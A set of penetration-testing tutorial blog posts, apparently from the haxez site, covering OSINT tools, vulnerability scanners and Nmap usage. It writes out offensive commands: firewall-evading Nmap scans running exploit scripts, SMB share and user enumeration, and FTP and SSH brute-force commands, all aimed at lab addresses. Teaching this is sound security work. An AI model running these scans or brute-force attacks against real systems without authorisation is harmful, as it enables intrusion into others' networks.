HaXeZ_Shodan_Cheat_SheetDownload

https://www.shodan.io

OSINT Framework

The OSINT Framework is a web application that catalogs everything you could want to know about Open Source Intelligence Gathering. It has a horizontal hierarchical structure and clicking one category will provide other categories and eventually a link to a resource. The resource will usually provide instructions or a tool for you to perform that specific type of OSINT. This web application has a lot to explore, more than can be covered in a single article.

https://osintframework.com

Whois

The Whois is a tool that can gather information about the registration of a domain. In some cases, it may tell you who registered it and include their contact details but this will depend on the domain privacy settings. This information could include the domain owners’ telephone number as well as their addresses. Furthermore, the owner information, domain registration date, and expiry date can also be provided by the tool.

whois google.com

NSlookup

You can use the nslookup tool to retrieve information about a domain. The information can include the domains name servers, the IP address, the mail servers, and various other records. It can tell you how the domain is configured, provide certain records, and may identify potential targets.

theHarvester

A tool that combines all of these techniques into one great command-line tool is the Harvester. The Harvester is a wrapper for other tools and can perform passive and active reconnaissance. It can use search engines to find subdomains and URLs. Additionally, It can use social media websites to find employee names and email addresses. To find the full list of tools utilized by theHarvester, head over to the developer’s GitHub page.

https://github.com/laramies/theHarvester

OSINT Conclusion

Passive reconnaissance can provide a wealth of information about a target that you are testing. While some of the information may be beyond the scope of the engagement, it can give you a good insight into their organization. The tools I’ve talked about above barely scrape the surface of the iceberg that is OSINT tools. Perhaps one day someone will create an and all in one, web-based OSINT scanner and it will become what Nessus is to vulnerability scans. I’m fond of Maltego and theHarvester and think they do a fantastic job but would love more functionality and a simpler interface. Input your domain, tick the boxes of what information you want to discover and then wait for the report.

Vulnerability Scanning

Posted on January 11, 2025 by haxez

Hello World and welcome to haxez, today I’m going to be covering Vulnerability Scanning. Vulnerability scanning is the process of using tools to scan your target for vulnerabilities. There are many different tools that can perform vulnerability scans and the type of target you are scanning will determine what tools you use. For example, if you’re looking for vulnerabilities that affect services on the host then you could use Nmap, Nessus, OpenVAS, and many others. However, if you’re attacking a web application then you would likely use Nikto, Burp Suite, OWASP ZAP, or some other tool.

Nmap Vulnerability Scanning

If you haven’t seen my post on Nmap then I would recommend giving it a read. It covers Nmap in more detail than I intend to do here. With that said, Nmap is a fantastic vulnerability scanner. Early in my IT career, I had many misconceptions about Nmap. I thought it was merely a network scanner used to identify what hosts were online and what services were running. How naive, Nmap is a comprehensive network auditing tool that can identify and exploit vulnerabilities. I use it on almost every project I’m on. I highly recommend reading more about the different flags and scripts before recklessly running them like I’m about to do.

The image below shows the output of a Nmap scan configured to find vulnerabilities. You can see from the results that it has found some CVEs. I first specified the ‘-g’ flag to set the source port to 53. This is useful for firewall evasion as some firewalls may be configured to allow DNS traffic in from any source. I then specified the ‘-f’ flag to fragment the packets. This works by splitting the packets into multiples of 8 which can also be beneficial for firewall evasion. Then, I specified ‘-sV’ to get the service versions and ‘-p0-‘ for all ports. Next, I specified the ‘–script’ argument followed by various categories of scripts to execute. Finally, I added the IP address and the ‘-T5’ to speed it up.

This configuration is incredibly reckless and you should never use it against production environments. I’m merely using it to demonstrate the power of Nmap. Do NOT do this.

sudo nmap -g 53 -f -sV -p0- -O --script vuln,auth,exploit 10.0.2.5 -T5

Nessus

Where to start! Nessus from Tenable is a powerful multifunctional vulnerability scanning and auditing solution. It can be used to scan entire ranges of IP addresses or perform audits from uploaded configuration files. Whether you’re on team red or blue, chances are you’ve used it or at least heard of it. Nessus is likely going to be your tool of choice when performing vulnerability assessments or full-on penetration tests. I will probably create a separate article and video focusing on Nessus as part of the Hacker Tools series. All you need to know for the moment is that it is an effective vulnerability scanner. They offer an essential version for you to play around and I highly recommend giving it a go. However, the professional version has many more cool toys.

The image below is of an advanced scan that I performed against the Metasploitable 2 virtual machine. I configured it to scan all ports (0–65535) and turned off the Denial of Service plugin. Other than that I only changed the reporting to report as much as possible. As you can see it has found a bunch of issues (as expected).

Nikto Web Application Scanning

Nikto is a free CLI web application vulnerability scanner. It will search for interesting directories and files, analyze response headers, check for outdated software, and look for vulnerabilities. It’s a good place to start when performing web application security assessments. Granted, it won’t hack into the website for you, but it will give you a good idea of things to look at during the early stages of the assessment. Nikto can be intrusive and I have seen web applications suffer performance issues when scanning them. However, the hardware that those apps were hosted on wasn’t fit for purpose. I’ve also found that Nikto can be tricked by web application firewalls. It will report a 200 response for every directory that it brute forces, even though it doesn’t exist. Or it will misidentify a vulnerability or some other incorrect server-side configuration.

Burp Suite Web Application Scanning

No vulnerability scanning article would be complete without Burp Suite from Portswigger. This is the Bugatti Veyron of web application vulnerability scanners. Unfortunately, I only have the community version installed in my home lab but I use the pro version almost daily. The pro version has many more features that allow for automated scanning and vulnerability detection. You still need to manually go through and verify those findings but Burp takes out a lot of the guesswork. It also has an extensive list of additional plugins that you can install to increase the functionality. If you’re looking to get a job in cybersecurity then knowing how to use Burp Suite will probably improve your chances once it comes to that technical test.

Conclusions

I know I have only scraped the surface on the different vulnerability scanners that are available. However, to cover them all would take forever and I only wanted to cover the ones that you are likely to come across first. Granted there are some amazing alternatives out there. Where you have Nessus, you also have OpenVAS. Where you have Burp Suite, you also have OWASP Zap. I’m not saying that one is better than the other, I suppose that comes down to personal preference and these tools are my personal preference. I know a guy who almost refuses to touch anything that isn’t command line based. Archie, I salute you. Anyway, definitely give these tools a try against your own test virtual machines. They are a lot of fun.

NMAP

Posted on January 11, 2025January 11, 2025 by haxez

Hello world, welcome to haxez where today I’m going to be talking about the network mapping tool Nmap. Nmap is a network scanner and was created by Gordon Lyon. It can be used to discover hosts on a network by sending packets to those hosts and then analyzing the responses. In other words, it can help you map out a target network. As a result, Nmap among other tools like Mass Scan is an essential tool for your ethical hacking tool kit. I use it on almost every engagement.

Nmap Host Discovery

As mentioned previously, Nmap can be used to discover hosts on a network. This can be done a number of ways but the most common is known as a ping sweep. A ping sweep does exactly that, it pings every host in the specified range and waits for a response to see if the host is online.

sudo nmap -sP 10.10.10.0-255

This can also be done without DNS resolution.

sudo nmap -sP 10.10.10.0-255 -n

However, this method isn’t full proof as hosts could have ICMP disabled meaning that they won’t respond to pings.

Nmap TCP Port Scan

The Nmap tool can also scan hosts and determine what TCP ports are open. This is done by initiating a three-way handshake with the host and analyzing the response. You can specify which ports or let it only scan the top 100 or 1000 ports. Additionally, you can also add service version detection to the scan by adding the ‘-sV’ argument.

sudo nmap -sT -sV -p0- 10.10.10.10

Nmap UDP Port Scan

Moreover, Nmap can also perform a UDP scan against the hosts. However, because UDP is a stateless protocol whereby the sending continues to send regardless of whether the host has responded, it can take time to determine whether a port is open.

sudo nmap -sU -p0- 10.10.10.10

Nmap Scripting Engine

One of the most powerful features of Nmap is its scripting engine. If you’re just starting out in computing or cyber, you could be forgiven for not knowing about it. Nmap is far more than a network scanner, it is a complete penetration testing framework. If you bring up your terminal and type in:

sudo locate *.nse

You can see the insane amount of scripts available for you to use against your targets. These scripts range from purely informational to exploitative. The scripts can be updated by running the following command.

sudo nmap --script-updatedb

SSL Scripts

One thing that I do frequently on an engagement is to test the configuration of the SSL certificate. This helps to ensure that all communication sent to and from the host is done so securely. Furthermore, it also helps to ensure that no specially crafted packets can be sent to the host to retrieve sensitive information.

sudo nmap --script ssl-cert -p 443 haxez.org

The command below can be used to enumerate the SSL ciphers and check for weak ones.

sudo nmap -sV --script ssl-enum-ciphers -p 443 haxez.org

DNS Zone Transfer Script

There is also a script that can perform DNS zone transfers. While there are other tools like dig and fierce that have a far less complex syntax, if you’re in a pinch and only have Nmap then it’s nice to know the option is there. This can be done by running the following command.

sudo nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=zonetransfer.me -p53 nsztm1.digi.ninja

So, if you’re on an engagement and you notice TCP port 53 is open. You could grab an absolute wealth of information by performing a DNS zone transfer.

SMB Share Enumeration

Imagine you’ve stumbled into a network and you’ve scanned a host and noticed that port 445 is open. You know that this is the port for Server Message Block or SMB for short. You also know that this port is used to share files and folders/directories across the network. Wouldn’t it be great if there was a way to see what shares were being shared? Well, there’s a script for that.

nmap --script smb-enum-shares.nse -p445 192.168.56.103

SMB User Enumeration

Ok so you now know what the shares are but you don’t know any users on the system that would have the privileges to access them. Well, there is a script for that which allows you to enumerate the users of the system via the SMB share.

nmap --script smb-enum-users.nse -p445 192.168.56.103

FTP Brute

So you now have a list of usernames but what do you do with them? Are there any other services that you can see? What’s that? Its running FTP? Why not brute force that service with Nmap’s FTP Brute force script.

sudo nmap --script ftp-brute -p21 192.168.56.103 --script-args userdb=ftp_defuser.lst,passdb=ftp_defuser.lst

SSH Brute

You notice another box or that the same box is running the remote management protocol SSH. You have a list of users and some passwords which you got from the FTP service. Why not use that wordlist to go attack the SSH login too.

sudo nmap -p 22 --script ssh-brute --script-args userdb=ssh-user.txt,passdb=password.txt 192.168.56.103

Increase Verbosity

There are some other arguments that could help you with your scans too. If you wanted to see exactly what Nmap is doing then you could increase the verbosity.

-v1 -v2 -v3

Increase Speed

Or if Nmap is running too slowly then you could increase the speed by adding a T4 argument to your scan. Be careful though as some systems with minimal resources might be offended by your scan and decided to crash due to resource exhaustion.

-T1 -T2 -T3 -T4

Conclusion

There are so many other types of scans like Syn scans, and Xmas scans that I could talk about. I could spend weeks talking about all the different scripts available. I don’t want to make this article too long though. Hopefully, I’ve covered enough to get you started with Nmap and to realize its enormous potential. I use it on almost every test that I do simply because it has almost everything I need. That isn’t to say I don’t verify the results with other tools, but it is usually my starting point on any engagement once the passive reconnaissance is out of the way.